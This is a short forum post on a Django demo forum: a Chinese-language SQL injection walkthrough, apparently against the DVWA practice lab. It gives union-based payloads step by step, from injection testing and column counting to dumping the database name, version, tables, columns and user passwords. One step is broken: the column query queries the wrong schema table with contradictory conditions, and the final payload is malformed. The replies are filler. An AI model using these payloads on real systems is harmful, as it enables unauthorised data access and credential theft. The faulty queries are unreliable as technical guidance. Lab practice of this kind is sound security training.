Test

Xuxing
Posted 2 months, 1 week ago in General, viewed 197 times

SQL注入 一、SQL注入的定义:很多Web应用程序都使用数据库来存储信息。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递至Web应用程序。很多Web站点都会利用用户输入的参数动态地生成SQL查询要求,攻击者通过在URL、表单域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据进行不受限的访问。简单来说,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 二、测试是否存在注入 1、输入1的时候可以正常回显。

2、输入1 and 1=1的时候可以正常回显。

And为逻辑运算,结果只有真(true)假(false),只有同时满足条件真(true)才能成立。

3、输入1 and 1=2返回错误不回显。

通过以上3点判断出存在注入点。

三、判断字段数 1、输入1 order by 2#回显,说明表中含有为2的字段。

2、输入1 order by 3出错,说明表中没含有为3的字段。

四、获取数据库名称和版本 1、输入1 union select 1,concat_ws(char(32,58,32),user(),database(),version()),获取用户名,数据库名,数据库版本。

concat_ws为字符串连接函数,连接user(),database(),version。

五、获取表名 1、输入1 union select 1,(table_name) from information_schema.tables where table_schema=’dvwa’得到两个表名。

六、查询列名 1、输入1 union select 1,column_name from information_schema.tables where table_schema=’user’and table_schema=’dvwa’。

七、得到用户名密码 1、输入union select password,user from users。

    appendix 1 2 months, 1 week ago

    66666666666666

    appendix 2 2 months, 1 week ago

    123123

2 Replies
Leave a Reply
NIJI APP
NIJI is a forum app built with Django

General

General discussions about Django, Python, Nijiforum etc.